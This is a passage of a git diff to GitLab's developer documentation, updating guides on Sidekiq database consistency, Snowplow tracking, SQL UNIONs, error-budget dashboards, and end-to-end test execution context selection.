from a replica. **Try to avoid +these scenarios, since `:always` should be considered the exception, not the rule.** + +To allow for reads to be served from replicas, we added two additional consistency modes: `:sticky` and `:delayed`. When you declare either `:sticky` or `:delayed` consistency, workers become eligible for database load-balancing. In both cases, jobs are enqueued with a short delay. @@ -504,7 +516,7 @@ they prefer read replicas and will wait for replicas to catch up: | **Data Consistency** | **Description** | |--------------|-----------------------------| -| `:always` | The job is required to use the primary database (default). It should be used for workers that primarily perform writes or that have very strict requirements around reading their writes without suffering any form of delay. | +| `:always` | The job is required to use the primary database (default). It should be used for workers that primarily perform writes or that have strict requirements around data consistency when reading their own writes. | | `:sticky` | The job prefers replicas, but switches to the primary for writes or when encountering replication lag. It should be used for jobs that require to be executed as fast as possible but can sustain a small initial queuing delay. | | `:delayed` | The job prefers replicas, but switches to the primary for writes. When encountering replication lag before the job starts, the job is retried once. If the replica is still not up to date on the next retry, it switches to the primary. It should be used for jobs where delaying execution further typically does not matter, such as cache expiration or web hooks execution. | @@ -539,7 +551,7 @@ The `feature_flag` property does not allow the use of This means that the feature flag cannot be toggled only for particular projects, groups, or users, but instead, you can safely use [percentage of time rollout](../development/feature_flags/index.md). Note that since we check the feature flag on both Sidekiq client and server, rolling out a 10% of the time, -will likely results in 1% (0.1 [from client]*0.1 [from server]) of effective jobs using replicas. +will likely results in 1% (`0.1` `[from client]*0.1` `[from server]`) of effective jobs using replicas. Example: @@ -968,8 +980,8 @@ Sidekiq jobs, please consider removing the worker in a major release only. For the same reasons that removing workers is dangerous, care should be taken when renaming queues. -When renaming queues, use the `sidekiq_queue_migrate` helper migration method, -as shown in this example: +When renaming queues, use the `sidekiq_queue_migrate` helper migration method +in a **post-deployment migration**: ```ruby class MigrateTheRenamedSidekiqQueue < ActiveRecord::Migration[5.0] @@ -985,3 +997,7 @@ class MigrateTheRenamedSidekiqQueue < ActiveRecord::Migration[5.0] end ``` + +You must rename the queue in a post-deployment migration not in a normal +migration. Otherwise, it runs too early, before all the workers that +schedule these jobs have stopped running. See also [other examples](post_deployment_migrations.md#use-cases). diff --git a/doc/development/snowplow/index.md b/doc/development/snowplow/index.md index 0bf4b9356e7..552249344c7 100644 --- a/doc/development/snowplow/index.md +++ b/doc/development/snowplow/index.md @@ -11,14 +11,14 @@ This guide provides an overview of how Snowplow works, and implementation detail For more information about Product Intelligence, see: - [Product Intelligence Guide](https://about.gitlab.com/handbook/product/product-intelligence-guide/) -- [Usage Ping Guide](../usage_ping/index.md) +- [Service Ping Guide](../service_ping/index.md) More useful links: - [Product Intelligence Direction](https://about.gitlab.com/direction/product-intelligence/) -- [Data Analysis Process](https://about.gitlab.com/handbook/business-ops/data-team/#data-analysis-process/) -- [Data for Product Managers](https://about.gitlab.com/handbook/business-ops/data-team/programs/data-for-product-managers/) -- [Data Infrastructure](https://about.gitlab.com/handbook/business-ops/data-team/platform/infrastructure/) +- [Data Analysis Process](https://about.gitlab.com/handbook/business-technology/data-team/#data-analysis-process/) +- [Data for Product Managers](https://about.gitlab.com/handbook/business-technology/data-team/programs/data-for-product-managers/) +- [Data Infrastructure](https://about.gitlab.com/handbook/business-technology/data-team/platform/infrastructure/) ## What is Snowplow @@ -58,7 +58,7 @@ To enable Snowplow tracking on a self-managed instance: 1. Expand **Snowplow**. -1. Select **Enable snowplow tracking** and enter your Snowplow configuration information. For example: +1. Select **Enable Snowplow tracking** and enter your Snowplow configuration information. For example: | Name | Value | |--------------------|-------------------------------| @@ -158,7 +158,7 @@ Snowplow JS adds many [web-specific parameters](https://docs.snowplowanalytics.c ## Implementing Snowplow JS (Frontend) tracking -GitLab provides `Tracking`, an interface that wraps the [Snowplow JavaScript Tracker](https://docs.snowplowanalytics.com/docs/collecting-data/collecting-from-own-applications/javascript-trackers) for tracking custom events. The simplest way to use it is to add `data-` attributes to clickable elements and dropdowns. There is also a Vue mixin (exposing a `track` method), and the static method `Tracking.event`. Each of these requires at minimum a `category` and an `action`. You can provide additional [Structured event taxonomy](#structured-event-taxonomy) properties along with an `extra` object that accepts key-value pairs. +GitLab provides `Tracking`, an interface that wraps the [Snowplow JavaScript Tracker](https://docs.snowplowanalytics.com/docs/collecting-data/collecting-from-own-applications/javascript-trackers/) for tracking custom events. The simplest way to use it is to add `data-` attributes to clickable elements and dropdowns. There is also a Vue mixin (exposing a `track` method), and the static method `Tracking.event`. Each of these requires at minimum a `category` and an `action`. You can provide additional [Structured event taxonomy](#structured-event-taxonomy) properties along with an `extra` object that accepts key-value pairs. | field | type | default value | description | |:-----------|:-------|:---------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| @@ -442,7 +442,7 @@ describe('MyFormTracking', () => { ## Implementing Snowplow Ruby (Backend) tracking -GitLab provides `Gitlab::Tracking`, an interface that wraps the [Snowplow Ruby Tracker](https://docs.snowplowanalytics.com/docs/collecting-data/collecting-from-own-applications/ruby-tracker) for tracking custom events. +GitLab provides `Gitlab::Tracking`, an interface that wraps the [Snowplow Ruby Tracker](https://docs.snowplowanalytics.com/docs/collecting-data/collecting-from-own-applications/ruby-tracker/) for tracking custom events. Custom event tracking and instrumentation can be added by directly calling the `GitLab::Tracking.event` class method, which accepts the following arguments: @@ -481,7 +481,7 @@ https://docs.gitlab.com/ee/development/testing_guide/best_practices.html#test-sn ### Performance -We use the [AsyncEmitter](https://docs.snowplowanalytics.com/docs/collecting-data/collecting-from-own-applications/ruby-tracker/emitters/#the-asyncemitter-class) when tracking events, which allows for instrumentation calls to be run in a background thread. This is still an active area of development. +We use the [AsyncEmitter](https://docs.snowplowanalytics.com/docs/collecting-data/collecting-from-own-applications/ruby-tracker//emitters/#the-asyncemitter-class) when tracking events, which allows for instrumentation calls to be run in a background thread. This is still an active area of development. ## Developing and testing Snowplow @@ -549,13 +549,13 @@ Snowplow Micro is a Docker-based solution for testing frontend and backend event update application_settings set snowplow_collector_hostname='localhost:9090', snowplow_enabled=true, snowplow_cookie_domain='.gitlab.com'; ``` -1. Update `DEFAULT_SNOWPLOW_OPTIONS` in `app/assets/javascripts/tracking.js` to remove `forceSecureTracker: true`: +1. Update `DEFAULT_SNOWPLOW_OPTIONS` in `app/assets/javascripts/tracking/index.js` to remove `forceSecureTracker: true`: ```diff - diff --git a/app/assets/javascripts/tracking.js b/app/assets/javascripts/tracking.js + diff --git a/app/assets/javascripts/tracking/index.js b/app/assets/javascripts/tracking/index.js index 0a1211d0a76..3b98c8f28f2 100644 - --- a/app/assets/javascripts/tracking.js - +++ b/app/assets/javascripts/tracking.js + --- a/app/assets/javascripts/tracking/index.js + +++ b/app/assets/javascripts/tracking/index.js @@ -7,7 +7,6 @@ const DEFAULT_SNOWPLOW_OPTIONS = { appId: '', userFingerprint: false, diff --git a/doc/development/snowplow/review_guidelines.md b/doc/development/snowplow/review_guidelines.md new file mode 100644 index 00000000000..285fbc3b44b --- /dev/null +++ b/doc/development/snowplow/review_guidelines.md @@ -0,0 +1,43 @@ +--- +stage: Growth +group: Product Intelligence +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Snowplow review guidelines + +This page includes introductory material for a +[Product Intelligence](https://about.gitlab.com/handbook/engineering/development/growth/product-intelligence/) +review, and is specific to Snowplow related reviews. For broader advice and +general best practices for code reviews, refer to our [code review guide](../code_review.md). + +## Resources for reviewers + +- [Snowplow Guide](index.md) +- [Event Dictionary](dictionary.md) + +## Review process + +We recommend a Product Intelligence review when a merge request (MR) involves changes in +events or touches Snowplow related files. + +### Roles and process + +#### The merge request **author** should + +- For frontend events, when relevant, add a screenshot of the event in + the [testing tool](../snowplow/index.md#developing-and-testing-snowplow) used. +- For backend events, when relevant, add the output of the + [Snowplow Micro](index.md#snowplow-mini) good events + `GET http://localhost:9090/micro/good` (it might be a good idea + to reset with `GET http://localhost:9090/micro/reset` first). +- Update the [Event Dictionary](event_dictionary_guide.md). + +#### The Product Intelligence **reviewer** should + +- Check that the [event taxonomy](../snowplow/index.md#structured-event-taxonomy) is correct. +- Check the [usage recommendations](../snowplow/index.md#usage-recommendations). +- Check that the [Event Dictionary](event_dictionary_guide.md) is up-to-date. +- If needed, check that the events are firing locally using one of the +[testing tools](../snowplow/index.md#developing-and-testing-snowplow) available. +- Approve the MR, and relabel the MR with `~"product intelligence::approved"`. diff --git a/doc/development/sql.md b/doc/development/sql.md index a98645cfcae..ddca88cb9bb 100644 --- a/doc/development/sql.md +++ b/doc/development/sql.md @@ -70,7 +70,7 @@ WHERE title ILIKE '%Draft:%'; Because the value for `ILIKE` starts with a wildcard the database is not able to use an index as it doesn't know where to start scanning the indexes. -Luckily, PostgreSQL _does_ provide a solution: trigram GIN indexes. These +Luckily, PostgreSQL _does_ provide a solution: trigram Generalized Inverted Index (GIN) indexes. These indexes can be created as follows: ```sql @@ -261,9 +261,9 @@ from `ActiveRecord::Base`. ## Use UNIONs -UNIONs aren't very commonly used in most Rails applications but they're very -powerful and useful. In most applications queries tend to use a lot of JOINs to -get related data or data based on certain criteria, but JOIN performance can +`UNION`s aren't very commonly used in most Rails applications but they're very +powerful and useful. Queries tend to use a lot of `JOIN`s to +get related data or data based on certain criteria, but `JOIN` performance can quickly deteriorate as the data involved grows. For example, if you want to get a list of projects where the name contains a @@ -279,7 +279,7 @@ OR namespaces.name ILIKE '%gitlab%'; ``` Using a large database this query can easily take around 800 milliseconds to -run. Using a UNION we'd write the following instead: +run. Using a `UNION` we'd write the following instead: ```sql SELECT projects.* @@ -301,7 +301,7 @@ This doesn't mean you should start using UNIONs everywhere, but it's something to keep in mind when using lots of JOINs in a query and filtering out records based on the joined data. -GitLab comes with a `Gitlab::SQL::Union` class that can be used to build a UNION +GitLab comes with a `Gitlab::SQL::Union` class that can be used to build a `UNION` of multiple `ActiveRecord::Relation` objects. You can use this class as follows: diff --git a/doc/development/stage_group_dashboards.md b/doc/development/stage_group_dashboards.md index 277c12fc938..8d44b36bc4a 100644 --- a/doc/development/stage_group_dashboards.md +++ b/doc/development/stage_group_dashboards.md @@ -42,13 +42,8 @@ We're currently displaying the information in 2 formats: 1. Budget Spent: This shows the time over the past 28 days that features owned by the group have not been performing adequately. -We're still discussing which of these is more understandable, please -contribute in -[Scalability issue #946](https://gitlab.com/gitlab-com/gl-infra/scalability/-/issues/946) -if you have thoughts on this topic. - The budget is calculated based on indicators per component. Each -component has 2 indicators: +component can have 2 indicators: 1. [Apdex](https://en.wikipedia.org/wiki/Apdex): The rate of operations that performed adequately. @@ -80,14 +75,44 @@ The calculation to a ratio then happens as follows: \frac {operations\_meeting\_apdex + (total\_operations - operations\_with\_errors)} {total\_apdex\_measurements + total\_operations} ``` -*Caveat:* Not all components are included, causing the -calculation to be less accurate for some groups. We're working on -adding all components in -[&437](https://gitlab.com/groups/gitlab-com/gl-infra/-/epics/437). This -could cause the dashboard to display "No Data" for features with lower -traffic. +### Check where budget is being spent + +The row below the error budget row is collapsed by default. Expanding +it shows which component and violation type had the most offending +operations in the past 28 days. + + + +The first panel on the left shows a table with the number of errors per +component. Digging into the first row in that table is going to have +the biggest impact on the budget spent. + +Commonly, the components spending most of the budget are Sidekiq or Puma. The panel in +the center explains what these violation types mean, and how to dig +deeper in the logs. + +The panel on the right provides links to Kibana that should reveal +which endpoints or Sidekiq jobs are causing the errors. + +To learn how to use these panels and logs for +determining which Rails endpoints are slow, +see the [Error Budget Attribution for Purchase group](https://youtu.be/M9u6unON7bU) video. + +Other components visible in the table come from +[service level indicators](https://sre.google/sre-book/service-level-objectives/) (SLIs) defined +in the [metrics +catalog](https://gitlab.com/gitlab-com/runbooks/-/blob/master/metrics-catalog/README.md). + +For those types of failures, you can follow the link to the service +dashboard linked from the `type` column. The service dashboard +contains a row specifically for the SLI that is causing the budget +spent, with useful links to the logs and a description of what the +component means. For example, see the `server` component of the +`web-pages` service: + + -## Usage +## Usage of the dasbhoard Inside a stage group dashboard, there are some notable components. Let's take the [Source Code group's dashboard](https://dashboards.gitlab.net/d/stage-groups-source_code/stage-groups-group-dashboard-create-source-code?orgId=1) as an example. diff --git a/doc/development/testing_guide/best_practices.md b/doc/development/testing_guide/best_practices.md index c44e26927fe..e153fa9f334 100644 --- a/doc/development/testing_guide/best_practices.md +++ b/doc/development/testing_guide/best_practices.md @@ -513,14 +513,14 @@ Finished in 34.51 seconds (files took 0.76702 seconds to load) #### Run `:js` spec in a visible browser -Run the spec with `CHROME_HEADLESS=0`, like this: +Run the spec with `WEBDRIVER_HEADLESS=0`, like this: ```shell -CHROME_HEADLESS=0 bin/rspec some_spec.rb +WEBDRIVER_HEADLESS=0 bin/rspec some_spec.rb ``` The test completes quickly, but this gives you an idea of what's happening. -Using `live_debug` with `CHROME_HEADLESS=0` pauses the open browser, and does not +Using `live_debug` with `WEBDRIVER_HEADLESS=0` pauses the open browser, and does not open the page again. This can be used to debug and inspect elements. You can also add `byebug` or `binding.pry` to pause execution and [step through](../pry_debugging.md#stepping) diff --git a/doc/development/testing_guide/end_to_end/environment_selection.md b/doc/development/testing_guide/end_to_end/environment_selection.md index bcdf0e104dd..2192d9c4ed4 100644 --- a/doc/development/testing_guide/end_to_end/environment_selection.md +++ b/doc/development/testing_guide/end_to_end/environment_selection.md @@ -1,68 +1,8 @@ --- -stage: none -group: unassigned -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +redirect_to: 'execution_context_selection.md' --- -# Environment selection +This file was moved to [another location](execution_context_selection.md). -Some tests are designed to be run against specific environments or [pipelines](https://about.gitlab.com/handbook/engineering/quality/guidelines/debugging-qa-test-failures/#scheduled-qa-test-pipelines). -We can specify what environments or pipelines to run tests against using the `only` metadata. - -## Available switches - -| Switch | Function | Type | -| -------| ------- | ----- | -| `tld` | Set the top-level domain matcher | `String` | -| `subdomain` | Set the subdomain matcher | `Array` or `String` | -| `domain` | Set the domain matcher | `String` | -| `production` | Match against production | `Static` | -| `pipeline` | Match against a pipeline | `Array` or `Static`| - -WARNING: -You cannot specify `:production` and `{ <switch>: 'value' }` simultaneously. -These options are mutually exclusive. If you want to specify production, you -can control the `tld` and `domain` independently. - -## Examples - -| Environment or pipeline | Key | Matches (regex for environments, string matching for pipelines) | -| ---------------- | --- | --------------- | -| `any` | `` | `.+.com` | -| `gitlab.com` | `only: :production` | `gitlab.com` | -| `staging.gitlab.com` | `only: { subdomain: :staging }` | `(staging).+.com` | -| `gitlab.com and staging.gitlab.com` | `only: { subdomain: /(staging.)?/, domain: 'gitlab' }` | `(staging.)?gitlab.com` | -| `dev.gitlab.org` | `only: { tld: '.org', domain: 'gitlab', subdomain: 'dev' }` | `(dev).gitlab.org` | -| `staging.gitlab.com & domain.gitlab.com` | `only: { subdomain: %i[staging domain] }` | `(staging|domain).+.com` | -| `nightly` | `only: { pipeline: :nightly }` | "nightly" | -| `nightly`, `canary` | `only: { pipeline: [:nightly, :canary] }` | ["nightly"](https://gitlab.com/gitlab-org/quality/nightly) and ["canary"](https://gitlab.com/gitlab-org/quality/canary) | - -```ruby -RSpec.describe 'Area' do - it 'runs in any environment or pipeline' do; end - - it 'runs only in production environment', only: :production do; end - - it 'runs only in staging environment', only: { subdomain: :staging } do; end - - it 'runs in dev environment', only: { tld: '.org', domain: 'gitlab', subdomain: 'dev' } do; end - - it 'runs in prod and staging environments', only: { subdomain: /(staging.)?/, domain: 'gitlab' } {} - - it 'runs only in nightly pipeline', only: { pipeline: :nightly } do; end - - it 'runs in nightly and canary pipelines', only: { pipeline: [:nightly, :canary] } do; end -end -``` - -If the test has a `before` or `after`, you must add the `only` metadata -to the outer `RSpec.describe`. - -If you want to run an `only: { :pipeline }` tagged test on your local GDK make sure either the `CI_PROJECT_NAME` CI/CD variable is unset, or that the `CI_PROJECT_NAME` variable matches the specified pipeline in the `only: { :pipeline }` tag, or just delete the `only: { :pipeline }` tag. - -## Quarantining a test for a specific environment - -Similarly to specifying that a test should only run against a specific environment, it's also possible to quarantine a -test only when it runs against a specific environment. The syntax is exactly the same, except that the `only: { ... }` -hash is nested in the [`quarantine: { ... }`](https://about.gitlab.com/handbook/engineering/quality/guidelines/debugging-qa-test-failures/#quarantining-tests) hash. -For instance, `quarantine: { only: { subdomain: :staging } }` only quarantines the test when run against staging. +<!-- This redirect file can be deleted after <2021-08-14>. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/testing_guide/end_to_end/execution_context_selection.md b/doc/development/testing_guide/end_to_end/execution_context_selection.md new file mode 100644 index 00000000000..8456cfa8314 --- /dev/null +++ b/doc/development/testing_guide/end_to_end/execution_context_selection.md @@ -0,0 +1,122 @@ +--- +stage: none +group: unassigned +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Execution context selection + +Some tests are designed to be run against specific environments, or in specific [pipelines](https://about.gitlab.com/handbook/engineering/quality/guidelines/debugging-qa-test-failures/#scheduled-qa-test-pipelines) or jobs. We can specify the test execution context using the `only` and `except` metadata. + +## Available switches + +| Switch | Function | Type | +| -------| ------- | ----- | +| `tld` | Set the top-level domain matcher | `String` | +| `subdomain` | Set the subdomain matcher | `Array` or `String` | +| `domain` | Set the domain matcher | `String` | +| `production` | Match the production environment | `Static` | +| `pipeline` | Match a pipeline | `Array` or `Static`| +| `job` | Match a job | `Array` or `Static`| + +WARNING: +You cannot specify `:production` and `{ <switch>: 'value' }` simultaneously. +These options are mutually exclusive. If you want to specify production, you +can control the `tld` and `domain` independently. + +## Examples + +### Only + +Run tests in only the specified context. + +Matches use: + +- Regex for environments. +- String matching for pipelines. +- Regex or string matching for jobs. + +| Test execution context | Key | Matches | +| ---------------- | --- | --------------- | +| `gitlab.com` | `only: :production` | `gitlab.com` | +| `staging.gitlab.com` | `only: { subdomain: :staging }` | `(staging).+.com` | +| `gitlab.com and staging.gitlab.com` | `only: { subdomain: /(staging.)?/, domain: 'gitlab' }` | `(staging.)?gitlab.com` | +| `dev.gitlab.org` | `only: { tld: '.org', domain: 'gitlab', subdomain: 'dev' }` | `(dev).gitlab.org` | +| `staging.gitlab.com and domain.gitlab.com` | `only: { subdomain: %i[staging domain] }` | `(staging\|domain).+.com` | +| The `nightly` pipeline | `only: { pipeline: :nightly }` | "nightly" | +| The `nightly` and `canary` pipelines | `only: { pipeline: [:nightly, :canary] }` | ["nightly"](https://gitlab.com/gitlab-org/quality/nightly) and ["canary"](https://gitlab.com/gitlab-org/quality/canary) | +| The `ee:instance` job | `only: { job: 'ee:instance' }` | The `ee:instance` job in any pipeline | +| Any `quarantine` job | `only: { job: '.*quarantine' }` | Any job ending in `quarantine` in any pipeline | + +```ruby +RSpec.describe 'Area' do + it 'runs in any environment or pipeline' do; end + it 'runs only in production environment', only: :production do; end + + it 'runs only in staging environment', only: { subdomain: :staging } do; end + + it 'runs in dev environment', only: { tld: '.org', domain: 'gitlab', subdomain: 'dev' } do; end + + it 'runs in prod and staging environments', only: { subdomain: /(staging.)?/, domain: 'gitlab' } {} + + it 'runs only in nightly pipeline', only: { pipeline: :nightly } do; end + + it 'runs in nightly and canary pipelines', only: { pipeline: [:nightly, :canary] } do; end +end +``` + +### Except + +Run tests in their typical contexts _except_ as specified. + +Matches use: + +- Regex for environments. +- String matching for pipelines. +- Regex or string matching for jobs. + +| Test execution context | Key | Matches | +| ---------------- | --- | --------------- | +| `gitlab.com` | `except: :production` | `gitlab.com` | +| `staging.gitlab.com` | `except: { subdomain: :staging }` | `(staging).+.com` | +| `gitlab.com and staging.gitlab.com` | `except: { subdomain: /(staging.)?/, domain: 'gitlab' }` | `(staging.)?gitlab.com` | +| `dev.gitlab.org` | `except: { tld: '.org', domain: 'gitlab', subdomain: 'dev' }` | `(dev).gitlab.org` | +| `staging.gitlab.com and domain.gitlab.com` | `except: { subdomain: %i[staging domain] }` | `(staging\|domain).+.com` | +| The `nightly` pipeline | `except: { pipeline: :nightly }` | ["nightly"](https://gitlab.com/gitlab-org/quality/nightly) | +| The `nightly` and `canary` pipelines | `except: { pipeline: [:nightly, :canary] }` | ["nightly"](https://gitlab.com/gitlab-org/quality/nightly) and ["canary"](https://gitlab.com/gitlab-org/quality/canary) | +| The `ee:instance` job | `except: { job: 'ee:instance' }` | The `ee:instance` job in any pipeline | +| Any `quarantine` job | `except: { job: '.*quarantine' }` | Any job ending in `quarantine` in any pipeline | + +```ruby +RSpec.describe 'Area' do + it 'runs in any execution context except the production environment', except: :production do; end + + it 'runs in any execution context except the staging environment', except: { subdomain: :staging } do; end + + it 'runs in any execution context except the nightly pipeline', except: { pipeline: :nightly } do; end + + it 'runs in any execution context except the ee:instance job', except: { job: 'ee:instance' } do; end +end +``` + +## Usage notes + +If the test has a `before` or `after` block, you must add the `only` or `except` metadata to the outer `RSpec.describe` block. + +To run a test tagged with `only` on your local GitLab instance, you can do one of the following: + +- Make sure you **do not** have the `CI_PROJECT_NAME` or `CI_JOB_NAME` environment variables set. +- Set the appropriate variable to match the metadata. For example, if the metadata is `only: { pipeline: :nightly }` then set `CI_PROJECT_NAME=nightly`. If the metadata is `only: { job: 'ee:instance' }` then set `CI_JOB_NAME=ee:instance`. +- Temporarily remove the metadata. + +To run a test tagged with `except` locally, you can either: + +- Make sure you **do not** have the `CI_PROJECT_NAME` or `CI_JOB_NAME` environment variables set. +- Temporarily remove the metadata. + +## Quarantine a test for a specific environment + +Similarly to specifying that a test should only run against a specific environment, it's also possible to quarantine a +test only when it runs against a specific environment. The syntax is exactly the same, except that the `only: { ... }` +hash is nested in the [`quarantine: { ... }`](https://about.gitlab.com/handbook/engineering/quality/guidelines/debugging-qa-test-failures/#quarantining-tests) hash. +For example, `quarantine: { only: { subdomain: :staging } }` only quarantines the test when run against `staging`. diff --git a/doc/development/testing_guide/end_to_end/index.md b/doc/development/testing_guide/end_to_end/index.md index 6ab288b0525..eca649b73a5 100644 --- a/doc/development/testing_guide/end_to_end/index.md +++ b/doc/development/testing_guide/end_to_end/index.md @@ -23,13 +23,13 @@ a black-box testing framework for the API and the UI. We run scheduled pipelines each night to test nightly builds created by Omnibus. You can find these pipelines at <https://gitlab.com/gitlab-org/quality/nightly/pipelines> -(need Developer access permissions). Results are reported in the `#qa-nightly` Slack channel. +(requires the Developer role). Results are reported in the `#qa-nightly` Slack channel. ### Testing staging We run scheduled pipelines each night to test staging. You can find these pipelines at <https://gitlab.com/gitlab-org/quality/staging/pipelines> -(need Developer access permissions). Results are reported in the `#qa-staging` Slack channel. +(requires the Developer role). Results are reported in the `#qa-staging` Slack channel. ### Testing code in merge requests @@ -100,7 +100,7 @@ You may have noticed that we use `gitlab-org/build/omnibus-gitlab-mirror` instea This is due to technical limitations in the GitLab permission model: the ability to run a pipeline against a protected branch is controlled by the ability to push/merge to this branch. This means that for developers to be able to trigger a pipeline for the default branch in -`gitlab-org/omnibus-gitlab`/`gitlab-org/gitlab-qa`, they would need to have the +`gitlab-org/omnibus-gitlab`/`gitlab-org/gitlab-qa`, they would need to have the [Maintainer role](../../../user/permissions.md) for those projects. For security reasons and implications, we couldn't open up the default branch to all the Developers. Hence we created these mirrors where Developers and Maintainers are allowed to push/merge to the default branch. @@ -212,6 +212,7 @@ Continued reading: - [Testing with feature flags](feature_flags.md) - [Flows](flows.md) - [RSpec metadata/tags](rspec_metadata_tests.md) +- [Execution context selection](execution_context_selection.md) ## Where can I ask for help? diff --git a/doc/development/testing_guide/end_to_end/resources.md b/doc/development/testing_guide/end_to_end/resources.md index b6aef123c64..0819a2f7b54 100644 --- a/doc/development/testing_guide/end_to_end/resources.md +++ b/doc/development/testing_guide/end_to_end/resources.md @@ -50,7 +50,7 @@ create the resource via the public GitLab API: - `#api_post_path`: The `POST` path to create a new resource. - `#api_post_body`: The `POST` body (as a Ruby hash) to create a new resource. -> Be aware that many API resources are [paginated](../../../api/README.md#pagination). +> Be aware that many API resources are [paginated](../../../api/index.md#pagination). > If you don't find the results you expect, check if there is more that one page of results. Let's take the `Shirt` resource class, and add these three API methods: diff --git a/doc/development/testing_guide/end_to_end/rspec_metadata_tests.md b/doc/development/testing_guide/end_to_end/rspec_metadata_tests.md index 8a929737ebe..7f541f1be3f 100644 --- a/doc/development/testing_guide/end_to_end/rspec_metadata_tests.md +++ b/doc/development/testing_guide/end_to_end/rspec_metadata_tests.md @@ -14,6 +14,7 @@ This is a partial list of the [RSpec metadata](https://relishapp.com/rspec/rspec | Tag | Description | |-----|-------------| | `:elasticsearch` | The test requires an Elasticsearch service. It is used by the [instance-level scenario](https://gitlab.com/gitlab-org/gitlab-qa#definitions) [`Test::Integration::Elasticsearch`](https://gitlab.com/gitlab-org/gitlab/-/blob/72b62b51bdf513e2936301cb6c7c91ec27c35b4d/qa/qa/ee/scenario/test/integration/elasticsearch.rb) to include only tests that require Elasticsearch. | +| `:except` | The test is to be run in their typical execution contexts _except_ as specified. See [test execution context selection](execution_context_selection.md) for more information. | | `:geo` | The test requires two GitLab Geo instances - a primary and a secondary - to be spun up. | | `:gitaly_cluster` | The test runs against a GitLab instance where repositories are stored on redundant Gitaly nodes behind a Praefect node. All nodes are [separate containers](../../../administration/gitaly/praefect.md#requirements-for-configuring-a-gitaly-cluster). Tests that use this tag have a longer setup time since there are three additional containers that need to be started. | | `:github` | The test requires a GitHub personal access token. | @@ -26,10 +27,10 @@ This is a partial list of the [RSpec metadata](https://relishapp.com/rspec/rspec | `:ldap_tls` | The test requires a GitLab instance to be configured to use an external LDAP server with TLS enabled. | | `:mattermost` | The test requires a GitLab Mattermost service on the GitLab instance. | | `:object_storage` | The test requires a GitLab instance to be configured to use multiple [object storage types](../../../administration/object_storage.md). Uses MinIO as the object storage server. | -| `:only` | The test is only to be run against specific environments or pipelines. See [Environment selection](environment_selection.md) for more information. | +| `:only` | The test is only to be run in specific execution contexts. See [test execution context selection](execution_context_selection.md) for more information. | | `:orchestrated` | The GitLab instance under test may be [configured by `gitlab-qa`](https://gitlab.com/gitlab-org/gitlab-qa/-/blob/master/docs/what_tests_can_be_run.md#orchestrated-tests) to be different to the default GitLab configuration, or `gitlab-qa` may launch additional services in separate Docker containers, or both. Tests tagged with `:orchestrated` are excluded when testing environments where we can't dynamically modify the GitLab configuration (for example, Staging). | | `:packages` | The test requires a GitLab instance that has the [Package Registry](../../../administration/packages/#gitlab-package-registry-administration) enabled. | -| `:quarantine` | The test has been [quarantined](https://about.gitlab.com/handbook/engineering/quality/guidelines/debugging-qa-test-failures/#quarantining-tests), runs in a separate job that only includes quarantined tests, and is allowed to fail. The test is skipped in its regular job so that if it fails it doesn't hold up the pipeline. Note that you can also [quarantine a test only when it runs against specific environment](environment_selection.md#quarantining-a-test-for-a-specific-environment). | +| `:quarantine` | The test has been [quarantined](https://about.gitlab.com/handbook/engineering/quality/guidelines/debugging-qa-test-failures/#quarantining-tests), runs in a separate job that only includes quarantined tests, and is allowed to fail. The test is skipped in its regular job so that if it fails it doesn't hold up the pipeline. Note that you can also [quarantine a test only when it runs in a specific context](execution_context_selection.md#quarantine-a-test-for-a-specific-environment). | | `:relative_url` | The test requires a GitLab instance to be installed under a [relative URL](../../../install/relative_url.md). | | `:reliable` | The test has been [promoted to a reliable test](https://about.gitlab.com/handbook/engineering/quality/guidelines/reliable-tests/#promoting-an-existing-test-to-reliable) meaning it passes consistently in all pipelines, including merge requests. | | `:repository_storage` | The test requires a GitLab instance to be configured to use multiple [repository storage paths](../../../administration/repository_storage_paths.md). Paired with the `:orchestrated` tag. | diff --git a/doc/development/testing_guide/end_to_end/running_tests_that_require_special_setup.md b/doc/development/testing_guide/end_to_end/running_tests_that_require_special_setup.md index 859b8f950e3..f200d6c682a 100644 --- a/doc/development/testing_guide/end_to_end/running_tests_that_require_special_setup.md +++ b/doc/development/testing_guide/end_to_end/running_tests_that_require_special_setup.md @@ -27,7 +27,7 @@ docker run \ To run the tests from the `/qa` directory: ```shell -CHROME_HEADLESS=false bin/qa Test::Instance::All http://localhost -- qa/specs/features/ee/browser_ui/3_create/jenkins/jenkins_build_status_spec.rb +WEBDRIVER_HEADLESS=false bin/qa Test::Instance::All http://localhost -- qa/specs/features/ee/browser_ui/3_create/jenkins/jenkins_build_status_spec.rb ``` The test automatically spins up a Docker container for Jenkins and tear down once the test completes. @@ -131,7 +131,7 @@ sudo nginx -s reload You could then run the tests from the `/qa` directory: ```shell -CHROME_HEADLESS=false bin/qa Test::Instance::All http://gitlab-gitaly-cluster.test -- --tag gitaly_cluster +WEBDRIVER_HEADLESS=false bin/qa Test::Instance::All http://gitlab-gitaly-cluster.test -- --tag gitaly_cluster ``` Once you have finished testing you can stop and remove the Docker containers: @@ -160,13 +160,13 @@ You might see NGINX issues when you run `gdk start` or `gdk restart`. In that ca Navigate to the folder in `/your-gdk/gitlab/qa` and issue the command: ```shell -QA_DEBUG=true CHROME_HEADLESS=false GITLAB_ADMIN_USERNAME=rootusername GITLAB_ADMIN_PASSWORD=rootpassword GITLAB_QA_ACCESS_TOKEN=your_token_here GITLAB_QA_ADMIN_ACCESS_TOKEN=your_token_here CLUSTER_API_URL=https://kubernetes.docker.internal:6443 bundle exec bin/qa Test::Instance::All https://[YOUR-PORT].qa-tunnel.gitlab.info/ -- qa/specs/features/browser_ui/8_monitor/all_monitor_core_features_spec.rb --tag kubernetes --tag orchestrated --tag requires_admin +QA_DEBUG=true WEBDRIVER_HEADLESS=false GITLAB_ADMIN_USERNAME=rootusername GITLAB_ADMIN_PASSWORD=rootpassword GITLAB_QA_ACCESS_TOKEN=your_token_here GITLAB_QA_ADMIN_ACCESS_TOKEN=your_token_here CLUSTER_API_URL=https://kubernetes.docker.internal:6443 bundle exec bin/qa Test::Instance::All 